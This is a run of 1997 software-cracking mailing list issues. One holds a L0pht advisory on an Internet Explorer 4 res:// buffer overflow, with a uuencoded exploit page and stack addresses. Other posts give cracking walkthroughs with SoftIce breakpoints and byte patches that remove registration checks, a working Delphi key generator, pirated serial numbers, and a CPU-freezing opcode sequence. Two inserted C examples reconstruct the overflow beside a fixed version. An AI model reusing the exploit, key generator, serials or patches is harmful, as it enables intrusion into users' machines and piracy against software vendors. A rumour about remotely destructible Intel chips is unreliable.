========================================================
+HCU Maillist Issue: 61 11/17/1997
--------------------------------------------------------
Send Articles To:......................... *************
Info, Help, Unsubscription, etc:....... ****************
========================================================

CONTENTS:

#1 Subject: OrcFinder(TM)
#2 Subject: SoftIce Basics
#3 Subject: a little challenge
#4 Subject: a little long but very nice

ARTICLES:

-----#1-------------------------------------------------
Subject: OrcFinder(TM)

Regarding the ORC riddle:

If non-HCU-ers find the answer to the riddle, fine. If HCU-ers find the answer (or have found the answer) it should be mentioned to HCU-ers alone if the answer reveals his true identity. He has been careful to protect the identities of his HCU-ers, and that same respect should be used in return.

Just my 2 cents.

+gthorne

-----#2-------------------------------------------------
Subject: SoftIce Basics

Hi all

Am I just stupid or is it impossible to get WIce to write to a file? Say for example I want a screen of SoftIce to be written to a text file so I can examine it later. Can this be done?

In any case, I really enjoy all the help and info on here. Thanks to everyone who takes time putting their thoughts to paper, so to speak.

Bye
GlorFindeL

______________________________________________________
Get Your Private, Free Email at **********************

-----#3-------------------------------------------------
Subject: a little challenge

Hello all,

there's a funny little program at *************************************
it's a diet program. Besides that, what's funny is that I can never manage to BPX into the exe, but only into vbrun300.dll or GDI, or USER, etc. Now, I am not *that* experienced with cracking, but I found this very strange. I trace and trace and trace, and it never shows up in the main exe. Could someone take a look?
Maybe it's something very simple, but perhaps it could result in a nice 'lesson' to us all.

WAFNA of FCA

-----#4-------------------------------------------------
Subject: a little long but very nice

Hello all, pls read....

Document: L0pht Security Advisory
URL Origin: ********************************
Release Date: November 1st, 1997
Application: Microsoft Internet Explorer 4.0 Suite
Severity: Viewing remote HTML content can execute arbitrary native code
Author: ****************
Operating Sys: Windows 95
-------------------------------------------------------------------------------

========
Scenario
========

The Microsoft Internet Explorer 4.0 Suite, including all programs supplied with it that read and/or process HTML from either local machines, intranet machines, or remote internet machines, is subject to a buffer overflow in the HTML decoding process. The buffer overflow can cause the application to page fault, or in the worst case, execute arbitrary precompiled native code.

=======
Example
=======

1. Copy the supplied HTML file(s) into a location that is accessible via the target application.
2. Point to it. Look at it.
3. Click on the link. (or let someone click it for you)
4. Become aware of what happens to your machine.
5. Freak out and beg Microsoft to make the bad man stop.

=================
Technical Details
=================

The problem here lies in the deciphering of the URL line format itself. The base HTML library that is used by the Internet Explorer 4.0 Suite and the following programs are vulnerable:

- Outlook Express (both mail and news)
- Windows Explorer
- Internet Explorer (different than regular explorer, really)

This problem, because it stems from a programming flaw in the HTML decoding system, is unaffected by the Explorer "Security Zones" feature. In other words, if you turn on the highest security level for the zone from where the exploit HTML is being viewed, you are still vulnerable.
The critical problem here is a buffer overflow in the parsing of a particular new type of URL protocol. The "res://" type of URL is meant to allow access to a local resource embedded in a local DLL file. This is useful for archiving entire websites into a DLL and is not, in its truest concept, a security flaw. For example, to read something out of the IE4.0 Tour (stored in a DLL) try the following URL:

res://ie4tour.dll/page1-6.htm

The buffer overflow is on the actual filename specified. To crash your machine go ahead and try

res://blahblahblah ... blahblah/

in your Internet Explorer window, where the amount of 'blah' equals 265 characters.

The function that goes through the filename and validates it is flawed on Windows 95. Without checking the length, the filename is uppercased, concatenated with '.DLL' if it isn't there already, and in the process, copied into a fixed size buffer.

========
Solution
========

Currently, there is no solution available for this flaw. You can't set any Internet Explorer options to avoid it, and you are not protected by any level of zone security. Simply don't surf the web, read email or view net news using Internet Explorer 4.0 until Microsoft puts up a hotfix.

============
Exploit Code
============

Here we go...

When constructing the exploit we want to try something useful. Let's start with appending text of your choice to AUTOEXEC.BAT... (note that running native code lets you do pretty much anything you want)

Note that the location of the exploit string in the stack is very important and it varies from target application to target application.

Constructing the exploit string:

Figure out stack location for exploit code...

App                  Loc
Internet Explorer    0x0057C144
Windows Explorer     0x0088A0F4
...

Yeah, I know that those locations have null bytes in them and you can't put those (or lowercase letters, or CR/LF or 0x07 or anything like that) in the exploit string... but we'll let Microsoft fix that for us.
Step through the process to see IE add that extra null character for you. Will they ever cease to amaze...

Put together what you wanna do, tack on the necessary jump addresses and all that. That's it.

And now, UUENCODED to preserve freshness:

*************************************************************************
* MAKE SURE YOU RUN THIS EXPLOIT WITH __INTERNET__ EXPLORER, _NOT_      *
* REGULAR OL' WINDOWS EXPLORER. (put it on a website and download it or *
* click on the IE desktop icon (run iexplore.exe) and type in the name  *
* of the file into the URL line) IT WON'T WORK OTHERWISE!!!!            *
* (though it could be made to do so)                                    *
*************************************************************************

----====/ SNIP
section 1 of uuencode 5.20 of file infect.htm by R.E.M.

begin 644 infect.htm
*************************************************************
M/"]T:71L93X-"CPO:&5A9#X-"CQB;V1Y(&)G8V]L;W(](T9&1D9&1B!T97AT
*************************************************************
*************************************************************
*************************************************************
*************************************************************
*************************************************************
M,]NS.5.[#-+G$('K$!"0$%-0N[#*^;__TX/$#)"0D)"[SX#YO__3D)"0N["O
*************************************************************
*************************************************************
*************************************************************
M"B(^#0H\9F]N="!F86-E/2)7:6YG9&EN9W,B('-I>F4]*S8^_SPO9F]N=#X\
*************************************************************
*************************************************************
->3X-"CPO:'1M;#X-"CX-
`
end
sum -r/size 62455/917 section (from "begin" to "end")
sum -r/size 5779/643 entire input file
/====---- SNIP

A haiku:

Microsoft IE
Is there no security?
Not if you ask me.
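The flaw class the advisory above describes, reconstructed by the editor as an added C example (this is not L0pht's code, not Microsoft's, and not part of the post or of the uuencoded infect.htm): the <file> part of a res:// URL is uppercased, gets ".DLL" appended when it is missing, and is copied into a fixed stack buffer with no length check, shown beside the same routine with the check it lacked. The 256-byte buffer size and the rule that the filename ends at the next '/' are assumptions; the advisory gives neither, it only says that roughly 265 characters crash the parser.

```c
/* Editor's reconstruction of the flaw class in the L0pht res:// advisory.
 * Not Microsoft's code. Buffer size and URL splitting rules are assumptions. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define DLL_NAME_MAX 256   /* assumed fixed buffer; the advisory says ~265 chars crash */

/* Locate the <file> part of a res:// URL: from after "res://" up to the next
 * '/' or the end of the string. Returns NULL if the URL is not res://. */
static const char *res_filename(const char *url, size_t *len)
{
    static const char prefix[] = "res://";
    if (strncmp(url, prefix, sizeof prefix - 1) != 0)
        return NULL;
    const char *start = url + (sizeof prefix - 1);
    const char *slash = strchr(start, '/');
    *len = slash ? (size_t)(slash - start) : strlen(start);
    return start;
}

/* Case-insensitive test for a trailing ".dll" within the first len bytes of s. */
static int has_dll_ext(const char *s, size_t len)
{
    if (len < 4) return 0;
    const char *e = s + len - 4;
    return e[0] == '.' && toupper((unsigned char)e[1]) == 'D'
        && toupper((unsigned char)e[2]) == 'L' && toupper((unsigned char)e[3]) == 'L';
}

/* VULNERABLE: mirrors the advisory's description. 'out' is a fixed buffer and
 * nothing bounds the copy or the append, so a 265-character <file> runs past
 * it and corrupts the stack (the overflow the advisory exploits).
 * Only ever call this with short names. */
void build_dll_name_vulnerable(const char *url, char out[DLL_NAME_MAX])
{
    size_t len, i;
    const char *name = res_filename(url, &len);
    if (!name) { out[0] = '\0'; return; }
    for (i = 0; i < len; i++)              /* unbounded copy while uppercasing */
        out[i] = (char)toupper((unsigned char)name[i]);
    out[i] = '\0';
    if (!has_dll_ext(out, len))
        strcat(out, ".DLL");               /* unbounded append */
}

/* HARDENED: same transformation, but the space needed (name + optional ".DLL"
 * + NUL) is computed and compared with outsz before anything is written.
 * Returns 0 on success, -1 when it would not fit or the URL is not res://. */
int build_dll_name_checked(const char *url, char *out, size_t outsz)
{
    size_t len;
    const char *name = res_filename(url, &len);
    if (!name) return -1;
    int ext = has_dll_ext(name, len);
    size_t need = len + (ext ? 0 : 4) + 1;
    if (need > outsz) return -1;           /* the check the original lacked */
    for (size_t i = 0; i < len; i++)
        out[i] = (char)toupper((unsigned char)name[i]);
    out[len] = '\0';
    if (!ext) memcpy(out + len, ".DLL", 5);
    return 0;
}

/* Small wrappers so results can be checked without handing buffers around. */
int checked_matches(const char *url, const char *expect)
{
    char buf[DLL_NAME_MAX];
    return build_dll_name_checked(url, buf, sizeof buf) == 0 && strcmp(buf, expect) == 0;
}

int vulnerable_matches(const char *url, const char *expect)   /* short names only */
{
    char buf[DLL_NAME_MAX];
    build_dll_name_vulnerable(url, buf);
    return strcmp(buf, expect) == 0;
}

/* Build "res://" + n x 'b' + "/x.htm" (the advisory's "blahblah..." URL) and
 * report what the checked builder does with it: 0 accepted, -1 rejected. */
int checked_result_for_length(size_t n)
{
    static char url[1024];
    if (n > 1000) return -1;
    memcpy(url, "res://", 6);
    memset(url + 6, 'b', n);
    strcpy(url + 6 + n, "/x.htm");
    char buf[DLL_NAME_MAX];
    return build_dll_name_checked(url, buf, sizeof buf);
}

int main(void)
{
    char buf[DLL_NAME_MAX];
    build_dll_name_checked("res://ie4tour.dll/page1-6.htm", buf, sizeof buf);
    printf("%s\n", buf);
    printf("265-char name: %s\n",
           checked_result_for_length(265) == -1 ? "rejected" : "accepted");
    return 0;
}
```

The hardened version computes the worst-case length before the first write, which is the whole fix: uppercasing and appending the extension are harmless once the destination is known to hold them. The vulnerable function is kept only to show the shape of the bug; running it on a long name is undefined behaviour.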
**************** (11/1/97)
-------------------------------------------------------------------------------
For more L0pht (that's L - zero - P - H - T) advisories check out:
********************************

=====End of Issue 61====================================

========================================================
+HCU Maillist Issue: 62 11/18/1997
--------------------------------------------------------
Send Articles To:......................... *************
Info, Help, Unsubscription, etc:....... ****************
========================================================

CONTENTS:

#1 Subject: WeightCm
#2 Subject: Likse 1.72
#3 Subject: Winice Text File saving.
#4 Subject: My first crack
#5 Subject: ie4 patching

ARTICLES:

-----#1-------------------------------------------------
Subject: WeightCm

WAFNA;

Here are my notes on WeightCM.

Go to register screen, enter 123123
ctrl-d into Soft-Ice
s ds:0 lffffffff "123123"
bpr ds:xxxxxxxx ds:xxxxxxxx+6 rw
ctrl-d back to program and press enter

When Soft-Ice breaks:
ds:si <---= your input
es:di <---= where it will go
bpr es:di es:di+6 rw

S-I breaks on repz scasb <--- counts input
S-I breaks on repz movsw <--- program stuff
S-I breaks on repz movsw <--- the spot

at the spot: (vbrun300(31) CS:958F)
d es:di <---= your input
scan up the data window, real PW is right on top of your input TWICE!

Now just shut down the program, re-start and enter the REAL PW number.

Hackmore

-----#2-------------------------------------------------
Subject: Likse 1.72

Hi all!

I wonder if anyone of you has met this Likse offline browser and could crack or even register it with a valid key you got from the author. Yesterday evening I tried to crack it, but got nowhere, so I thought I'd ask if anyone has already worked with this.
Annoying features:
- nagscreen,
- you cannot export the htm file to text; the register info says you can export only the first 50 lines, but actually the only thing I could export is the register info file :(
- if you search for a string in files only the first five hits are displayed (even this number is not correct, I could see only four hits)

The reginfo says everything can be unlocked with a correct user key. Ok, I said let's do some work: deadlisting, looking for the bad guy string, I have found the validation routine. Patched the jump after it: "Thank you for registration..blahbla". Name and ID written into ini file. Restart program, registration routine called at the beginning to check for Name and ID read from the file. Patched the jump there too, program goes on happily, the nag screen gone, but ...oops you still can not export and the search is still limited. Shit, this will be longer than I thought :)

Ok, let's dive deeper into the key generation routine (man, I hate to do this), probably some flags are set there. After long and unsuccessful Iceing I got really bored with it. The routine is long, complex, does a lot of things which have nothing to do with key validation (at least I think), it uses push address, ret instead of jumps etc. It might be intentionally complicated but I think it's just badly written spaghetti code.

Ok, I will not get a valid key soon, let's give it up and check out Oscar. It has four keys for 1.x ver, I punch them in. The same shit: "Thanks for registering..", nagscreen goes, but all the limitations remain.

Ok, let's attack from the other direction, I pinpoint the routines dealing with the limited functions to look for a flag check before they execute the bad guy version etc. Not even a single conditional jump in them, the limit seems to be hard coded, and no obvious way to unlock them with a password.
It seems to me that the author had a first version with the ability to unlock with a key, but later, due to the appearance of valid keys on the net, he just went for a crippled version. Leaving the whole bazaar of registration in it is a nice touch, certainly lets the cracker work a lot for nothing. On the other hand he might be just too lazy to rewrite the reginfo file, considering that the current limitations are not exactly what's written in the info.

So my problem is: can this program be unlocked with a certain key (meaning that I have been fooled completely by the protection) or does the guy say to the normal customers when they call: Ohh, no... the registration is not working like that anymore. We will ship you the complete version instead of the key as soon as possible. Have a nice day... :)

Bye
Zer0+

PS: Of course I will try to patch the limited functions, but that's a totally different ball game.

-----#3-------------------------------------------------
Subject: Winice Text File saving.

Hi GlorFindeL,

>Subject: SoftIce Basics
>Hi all
>Am I just stupid or is it impossible to get WIce to write to a file. Say
>for example I want a screen of SoftIce to be written to a text file so

You can't 'save' the softice screen itself (you can print it), but you can save the softice history.

First, fire up symbol loader and go to softice initialization settings. Put a history buffer size of more than 0Kb, obviously :-) (default is 256, not enough for big listings).

Second, fire up winice / ntice. Put your breakpoints and all to arrive at the wanted code. Disassemble with, for example, U CS:EIP L 1000

Third, CTRL-D immediately to return to W95/NT, fire up symbol loader again and choose File/Save Softice History As...

And the saved file contains your code, winice loading, all you type (even if you're tracing WITHOUT the code window on), etc...

Cya.
FootSteps.

-----#4-------------------------------------------------
Subject: My first crack

Hi, All!
Well, at last :-)))

I don't know if you remember some messages I sent about cracking apps using VCL. VCL stands for "Visual Component Library", a library used by recent Borland visual languages such as Delphi and BC++ Builder. This kind of environment uses a proprietary format of resources, which appear as "RCDATA" when listed by RWS.

These resources contain "forms". Forms, in Delphi jargon, are the windows of the program, and all the info about their design is stored there. When a Delphi app is starting, the initialization code creates the forms, loading the required information from the resources. Sometimes this loading is deferred for forms not used very often, which are created and destroyed as needed. This system is the best and the worst of Delphi. It allows a very fast way of programming but, for big apps, it can slow down the loading time.

The really interesting part of this information is that the addresses of the routines -called in response to user actions over the elements of the form- are bound at run time by name. So knowing these names we can find the addresses. If you have cracked Delphi apps, you surely have experienced a long chain of calls inside the library, from the breakpoints on the API calls to the "do something" code.

I hoped that those addresses could help pinpointing the code. +ReZiDeNt suggested that I test this method against a "real world" program: Flexed, an HTML editor written in Delphi, and I installed it. But the weeks passed and I hadn't time to work on it. When I started it yesterday I found a nasty "Your evaluation period has expired" :-(

I had convinced an old Windows programmer to join me in making a new tool for spying all the information about Delphi and BC++B forms. I'm going to publish it on the web, but it needs some final touches, so please wait some days.

BTW, I'm going to be netless for a few days, so be patient if I can't reply to any question about this as quickly as I would like.
I used this tool to obtain the information about "TSplashForm" and this is what I got:

-------------------------------
object SplashForm: TSplashForm
  Left = 240
  Top = 150
  ...
  // lot of blahblahblah here
  ...
    TabOrder = 0
  end
  object RegButton: TButton
    Left = 200
    Top = 176
    Width = 97
    Height = 25
    Caption = 'Register'
    TabOrder = 1
    OnClick = RegButtonClick
  end
end
---------------------

(you can also use RWS or simply hexedit it, but converted to text it is clearer)

Well. It seems to be here, near the end:

OnClick = RegButtonClick

This is what happens when the user presses the button with the caption "Register". Using Hex Workshop, I looked for "RegButtonClick" and I found it twice. The second is the resource itself, the first is within an address table:

000A4990 ____ ____ ____ BC57 4A00 0E52 6567 4275 ______.WJ..RegBu
000A49A0 7474 6F6E 436C 6963 6B__ ____ ____ ____ ttonClick_______

Now look at the magic numbers before the name. There is an 0E byte indicating the length of "RegButtonClick" (14 characters) and even before, an address: 004ABC57. WDasm seems to think that this is too long a file and deserves disassembling correctly, but with Softice we can bpx this and... right! it stops at this point just when we push the button.

Tracing some instructions forward you'll find a "standard stack frame" in 44ECC8. From this point, there are some calls to show a dialog asking for the user name and a register key.

You can enter the name you choose, and anything as the key, after BPXing 44ED69. Here, a call to a routine compares two strings. D EDX will show the fake key you entered and D EAX, the correct calculated key.

Err... I'm still learning to use SoftIce so I was tempted to stop here. But, no!! a little cocktail with Spanish whisky. I don't know if it's more similar to vodka-martini or Wafna's kerosene... but it worked :*)

The encryption algorithm is in 0044E714, called a little before the str-comp.
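The hex-dump lookup above turned into a reusable check, as an added example by the editor (C; this is neither +trurl's frmspy nor any code from Flexed): scan a binary image for a Pascal ShortString holding the handler name and read the 32-bit little-endian address stored just before its length byte. The sample bytes are constructed from the dump at 000A4990 with the unknown bytes zero-filled, plus a made-up decoy entry "RegButtonClickAll" to show why the length prefix must match before the preceding bytes are trusted. Two caveats a practitioner wants: the dump's ASCII column (".WJ.") fixes the byte order as BC 57 4A 00, which read little-endian is 0x004A57BC rather than 004ABC57, so check the raw bytes rather than a word-grouped transcription; and the name is also stored in the form resource, so a hit must additionally be checked against where it falls (code/data versus resources), which this scanner leaves to the caller by reporting the offset.

```c
/* Editor's added example: name-table lookup for Delphi event handlers.
 * Layout assumed from the post's dump only: [4-byte LE address][len][name]. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef struct {
    size_t   offset;    /* offset of the name's length byte in the image */
    uint32_t address;   /* 32-bit little-endian value stored just before it */
} method_hit;

/* Scan blob for ShortString occurrences of 'name' (1-byte length prefix equal
 * to strlen(name), then the bytes) and record the address preceding each
 * prefix. The prefix check discards hits where the name is only a substring
 * of a longer identifier. Returns the number of hits stored (at most max). */
size_t find_method_hits(const uint8_t *blob, size_t len, const char *name,
                        method_hit *out, size_t max_hits)
{
    size_t n = strlen(name), count = 0;
    if (n == 0 || n > 255) return 0;
    /* i is the first name byte; 4 address bytes + 1 length byte precede it */
    for (size_t i = 5; i + n <= len && count < max_hits; i++) {
        if (blob[i - 1] != (uint8_t)n || memcmp(blob + i, name, n) != 0)
            continue;
        const uint8_t *a = blob + i - 5;
        out[count].offset  = i - 1;
        out[count].address = (uint32_t)a[0] | ((uint32_t)a[1] << 8)
                           | ((uint32_t)a[2] << 16) | ((uint32_t)a[3] << 24);
        count++;
    }
    return count;
}

/* Constructed sample, not a real dump of Flexed: a decoy entry for
 * "RegButtonClickAll" (length 0x11) followed by the entry from the post's
 * dump at 000A4990: six unknown bytes (zeroed here), BC 57 4A 00, 0E,
 * "RegButtonClick", then trailing unknown bytes (zeroed). */
static const uint8_t sample[] = {
    0x11,0x22,0x33,0x00, 0x11,
    'R','e','g','B','u','t','t','o','n','C','l','i','c','k','A','l','l',
    0x00,0x00,0x00,0x00,0x00,0x00,
    0xBC,0x57,0x4A,0x00, 0x0E,
    'R','e','g','B','u','t','t','o','n','C','l','i','c','k',
    0x00,0x00,0x00,0x00,0x00,0x00,0x00
};

/* Convenience wrappers over the constructed sample. */
uint32_t sample_lookup(const char *name)
{
    method_hit h;
    return find_method_hits(sample, sizeof sample, name, &h, 1) ? h.address : 0;
}

size_t sample_hit_count(const char *name)
{
    method_hit h[8];
    return find_method_hits(sample, sizeof sample, name, h, 8);
}

size_t sample_hit_offset(const char *name)   /* 0 when not found */
{
    method_hit h;
    return find_method_hits(sample, sizeof sample, name, &h, 1) ? h.offset : 0;
}

int main(void)
{
    method_hit hits[8];
    size_t n = find_method_hits(sample, sizeof sample, "RegButtonClick", hits, 8);
    for (size_t i = 0; i < n; i++)
        printf("RegButtonClick at offset %zu -> handler 0x%08X\n",
               hits[i].offset, hits[i].address);
    return 0;
}
```

With a real image, read the whole .exe into memory, run the scan, and set the SoftIce breakpoint on the reported address; a hit whose offset lies inside the resource section is the DFM copy and carries no usable address in front of it.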
Well, there's a lot of additional details I needed to handle, but I'm sure you are not very interested in them right now O:-) I'll write an essay with everything and send it to Fravia... maybe the protection scheme is not very interesting but I think the *cracking scheme* is.

I thought it would be nice to write the key generator in Delphi itself. But don't worry, it's less than 6kb. If you have Delphi 32bits, save this as HCUFE32.dpr, load and run. If you want to translate it to another language, take a look at 00402B94, the source of the random number generator. The "seed" must be initialized to 0EEEEH.

------------------------------------
program HCUFE32;

{$APPTYPE CONSOLE}

uses
  SysUtils;

function Convert( sUserName: string ): string;
var
  n: Integer;
  IterateRandom: Integer;
  Calculated: Integer;
  Selected: Integer;
  sFiltered: string;
  b1, b2: Byte;
begin
  sUserName := UpperCase( sUserName );
  sFiltered := '';
  { Byte arithmetic wraps at 256: b1 < $a keeps '0'..'9', b2 < $1a keeps
    'A'..'Z'; every other character is dropped from the name }
  for n := 1 to Length( sUserName ) do
  begin
    b1 := Ord( sUserName[ n ] ) + $d0;
    b2 := b1 + 239;
    if ( b1 < $a ) or ( b2 < $1a ) then
      sFiltered := sFiltered + sUserName[ n ];
  end;
  Result := '';
  if sFiltered = '' then Exit;
  { Same seed as the program uses (see 00402B94) }
  RandSeed := $EEEE;
  for n := 1 to 12 do
  begin
    { Pick a character of the filtered name, then pull that many random
      digits; only the last one is kept as the next key digit }
    Selected := Ord( sFiltered[ Succ( Random( Length( sFiltered ) ) ) ] );
    for IterateRandom := 1 to Selected do
      Calculated := Random( 10 );
    Result := Result + IntToStr( Calculated );
  end;
end;

var
  s: string;
begin
  Writeln;
  Write( 'User name: ' );
  Readln( s );
  s := Convert( s );
  if s = '' then
    Writeln( 'Incorrect user name... sorry, try again O:-)' )
  else
    Writeln( 'Your user key is ' + s + ' courtesy of +HCU.' );
  Write( 'Press RETURN to return...' );
  Readln
end.
-----------------------------------------------------------------

Thanks to +ReZiDeNt for his help and encouragement ;)

greetings
+trurl

P.D. I've seen a message here about MultiEdit. This is not a Delphi app. Maybe some DLLs are written with Delphi, but it doesn't use VCL.
As you have seen just a little above, it's possible to write apps or DLLs in Delphi without using VCL at all.

-----#5-------------------------------------------------
Subject: ie4 patching

The bug in IE (apparently a more general bug than that) is supposedly fixed with the patch below. Here is a copy of the message from the bugtraq mailing list. I do not have IE4, nor do I care to install it for a long time, so test this at your own risk.

+gthorne

--- message here ---

The patch will be to the mshtml control which is the core of Internet Explorer and is what the other applications mentioned by l0pht will be using. Hence the patch to IE will fix the other apps.

John Wiltshire

> -----Original Message-----
> From: Richard Trott ******************************
> Sent: Friday, November 14, 1997 5:39 AM
> To: ********************
> Subject: IE4.0 patch
>
> Microsoft released a patch for the recently-reported (via l0pht--see
> ******************************** if you missed it on bugtraq) buffer
> overflow in Win95 with regard to res:// type URLs.
>
> Does anyone know if the patch
> ************************************************************** to get
> it)
> actually fixes Win95, or if it's just an IE patch? The l0pht advisory
> indicated that other apps were vulnerable because the problem was with
> Win95, not IE. (Easy, if not-so-thorough, way to test: use Outlook
> Express (or Windows Explorer) to view a bogus res:// URL of longer
> than
> 256 characters and watch it crash Outlook Express (or Windows
> Explorer).
> Install patch above. Try again. Does it still crash? I don't have a
> Win95 machine at my disposal to test this with...)
>
> Richard Trott
> ***********************

=====End of Issue 62====================================

========================================================
+HCU Maillist Issue: 63 11/19/1997
--------------------------------------------------------
Send Articles To:......................... *************
Info, Help, Unsubscription, etc:....... ****************
========================================================

CONTENTS:

#1 Subject: Solving +Orc riddle?
#2 Subject: chez.com
#3 Subject: Likse 1.72

ARTICLES:

-----#1-------------------------------------------------
Subject: Solving +Orc riddle?

Hail +All:

More than anything else, the honor to meet +Orc and all the other +personalities holds more appeal than chasing a cyberspace riddle. What if we held a year 2000 convention (kind of like a class reunion) with the guests of honor being the +Master and his famous +three disciples of fravia+, +gthorne, and +Sync? Would anyone show up for the occasion?

Each name you come across in this ML and the essay submissions is a riddle. We could solve all the riddles and the personalities behind the masks at one time. Think about it, Hackmore. Why did you abstain from voting on your own survey? Rather than buy software, would you spend the money on a plane ticket to meet +Orc if it was possible?

wlc

-----#2-------------------------------------------------
Subject: chez.com

Hello all,

remember *************
The only place where you get 10MB of free web space and an e-mail address which you can access via POP3 protocol?

Well, they are now limiting new users to French people, ie, you need to have an e-mail address which ends in .fr

Since most people on the +HCU mail-list seem to be in Europe, does anyone here have a .fr address? (it would only be used to receive a single e-mail from chez.com; then you would reply for me, and that would validate my address).
TIA,
WAFNA

-----#3-------------------------------------------------
Subject: Likse 1.72

Likse V1.72 (c) Faico 16/32 bits VERSION
WORKING REG ********************
NAME:CKL!1997
SN:2909679-2590 SINGLE LIC
SN:2909679-159 SITE LIC
SN:2909679-4694 ROYALTY FREE
SN:2909679-4210 LICENSE

DEEP TRACE NEEDED, CATCH HMEMCPY
MAIN PROT SCHEME IS A CMP EAX,[EBP-14] WHERE EAX IS HEXED OF FIRST PART OF THE SN AND EBP-14 THE HEXED OF FAKE
IT'S LIKE:
CMP EAX,[EBP-14]
SETZ BL
....
IF FIRST SN PART OK CONTINUE AND AFTER A CALL THE SECOND TEST AS
CMP EAX,[EBP-18]
WITH HEXED OF SECOND PART
IF WRONG TEST REJUMP UP AND TEST SAME IF SINGLE,SITE,ROYALTY,LIC 4X EACH HEXED IN EAX
TIME LOST TO GENERATE ALL LICENSED VERSIONS: done in 5 minutes

______________________________________________________
Get Your Private, Free Email at **********************

=====End of Issue 63====================================

========================================================
+HCU Maillist Issue: 64 11/20/1997
--------------------------------------------------------
Send Articles To:......................... *************
Info, Help, Unsubscription, etc:....... ****************
========================================================

CONTENTS:

#1 Subject: 2k Party and FTP
#2 Subject: Yet another site-grabber
#3 Subject: pentium bug
#4 Subject: possible sighting of unusual behaviour by (possibly) Likse? ;-)

ARTICLES:

-----#1-------------------------------------------------
Subject: 2k Party and FTP

Fravia and myself would probably go for the idea of a party - we both love a good beer :)

+ORC and our original HCU counterpart(s) are always an enigma however. I think that even if we did figure out who +ORC is, and even if he met Fravia or myself, it would be another ice age before we could get him to show up.

I suppose any of you who tried the new ftp site (listed as FTP2 below) noticed - it was hacked by someone with the fun little f00f bug and has been redone.
The address below works, and when I get a chance I will update my pages to reflect this.

For fun, I have set up an incoming directory there for you guys. Don't overload it, we only have so much space, but when you guys discuss an important software tool here, feel free to up it there if you lack someplace to put things. I reserve the right to move things around (or make space if the site gets full, since I am not the only person with access, by removing a few things).

Take care

+gthorne

/*****************************************************\
Greythorne The Technomancer
WebSite: *******************************
(AKA:) ************************************
(IP:) ****************************
Gateway: *************************************
Old Mirror: ******************************
FTP1: ******************************************
FTP2: *******************************************
\*****************************************************/

-----#2-------------------------------------------------
Subject: Yet another site-grabber

Hi!

Internet Marauder is another program to download entire sites. It's not very lengthy (750kb unzipped). Speed is reasonable. Easy to use. Version 1.4 is downloadable at any simtelnet mirror:

....simtelnet/win95/inet/mdr14.zip

It's also inexpensive, $10... err, you can also patch at 401842, replacing:

:00401842 55      push ebp
:00401843 33C9    xor ecx, ecx
....

simply with:

:00401842 33C0    xor eax, eax
:00401844 C3      ret
....

This also removes some limitations.

bye
+trurl

-----#3-------------------------------------------------
Subject: pentium bug

Hello all,

On 10 Nov 97 at 7:21, +HCU ML wrote:

> #7 Subject: pentium bug
> -----#7-------------------------------------------------
> Subject: pentium bug
>
> Hi all!
>
> I just came across the info:
> the F0, 0F, C7, C8 instruction codes freeze a pentium processor and
> only the reset helps. This translates to the LOCK CMPXCHG EAX
> instruction which is not a privileged instruction so you can do it in
> all rings.
> With this you can kill a multiuser system (NT or linux)
> instantly. The only way to bring it back is going to the machine and
> press reset. That much about secure operating systems on a PC. BTW I
> have 486 and PPro so I could not check the info.

Well, allow me to introduce myself: I live in South America, where I work at an Embassy as a diplomat, and, because of that, I have contacts with lots of people in greedy govt agencies. This having been said, I should add that I am not a spy among crackers....

I began with a Sinclair in 1980, moved to a Vic20 in 1982, evolved to an Apple in 1984, and went to the PC in 1987. I began using machine code on the Vic20, and I always liked it, although on the PC it seems quite strange.....

Anyway, what I wanted to tell you is something I got from a source in an American agency about INTEL chips. Apparently, esp. those which ended up used for defense (the source mentioned Iraq), have something embedded in them by which they can be disabled by a certain series of variations in voltage from the power line. Not all chips have this, and this 'protection' would enable the US govt to destroy ('explode' and 'blow up' were the words used by my source) the chips in certain areas.

Now, if that is true, it's awfully clever.......

WAFNA

-----#4-------------------------------------------------
Subject: possible sighting of unusual behaviour by (possibly) Likse? ;-)

Hello +Zer0,

> I wonder if anyone of you have met this Likse offline browser and
> could crack or even register it with a valid key you got from the
> author. Yesterday evening I tried to crack it, but got nowhere, so I
> thought I ask if anyone has already worked with this.

Hmm.....awhile ago I was looking for a suitable (eg crackable :-)) offline browser for a project - many that I found were simply deadware - but I found a few useful ones which seemed crackable, including Likse.
Anyway, I didn't like Likse for a number of reasons, but I'm pretty sure I did crack it (I say pretty sure because I think I remember a very unusual scheme it used - at least for a Windows program - but I don't have any notes made of it, probably because I cracked it in the wee hours and was only half-awake at best :-)) - if I remember correctly, Likse actually *patched itself* - I've not seen this behaviour before or since in a Windoze program, but I do remember thinking how unusual it was. I can't be absolutely certain it was Likse that used that, but I think it might be - so you might want to take a quick look at any suspicious file I/O routines.

Cheers,
+ReZiDeNt

=====End of Issue 64====================================

========================================================
+HCU Maillist Issue: 65 11/21/1997
--------------------------------------------------------
Send Articles To:......................... *************
Info, Help, Unsubscription, etc:....... ****************
========================================================

CONTENTS:

#1 Subject: Assembly
#2 Subject: Re: Likse

ARTICLES:

-----#1-------------------------------------------------
Subject: Assembly

Hello all,

for those who want to read the latest on INTEL's undocumented features, check ******************************** (text only) or ****************** (with images).

IMHO, that would be worth a note on Fravia's pages re protections - imagine something based on an INTEL undocumented feature, something really strange..... that would block away most crackers.....

WAFNA

-----#2-------------------------------------------------
Subject: Re: Likse

Hi all!

Somebody wrote:

>Likse V1.72 (c) Faico 16/32 bits VERSION WORKING REG *********************
>NAME:CKL!1997
>SN:2909679-2590 SINGLE LIC
>SN:2909679-159 SITE LIC
>SN:2909679-4694 ROYALTY FREE
>SN:2909679-4210 LICENSE

Unfortunately, these keys are not working with the Likse version I downloaded yesterday again.
(Zip file 394 406 bytes, exe file 550 912 bytes. My fault that I forgot to give the exact specifications of the target previously.)

So the quest is still up: Can somebody provide a working key (even obtained from the author) to unlock this version? :) I still think the author just gave up this registration thing altogether.

Anyway, I worked on the program yesterday and here is the fix.

Elimination of the nag screen:

:00455FC3 call 00455B30      /This routine checks the key
:00455FC8 mov ebx, eax
:00455FCA test ebx, ebx
:00455FCC jl 00456126        /Nuke this jump

This patch makes the program believe it has a valid REGNAME and REGID key in the [APPINFO] section of the Lkaccess.ini file even when there is no such section at all. (you can make it if you want with your name. :)

Elimination of the 50 line limit from the export text function: Piece of cake!

:0045E73C cmp si, 0032
:0045E740 jbe 0045E746       /Nuke this with NOP, INC ESI
:0045E742 mov si, 0032       / NOP, INC ESI, NOP, NOP
:0045E746 test si, si

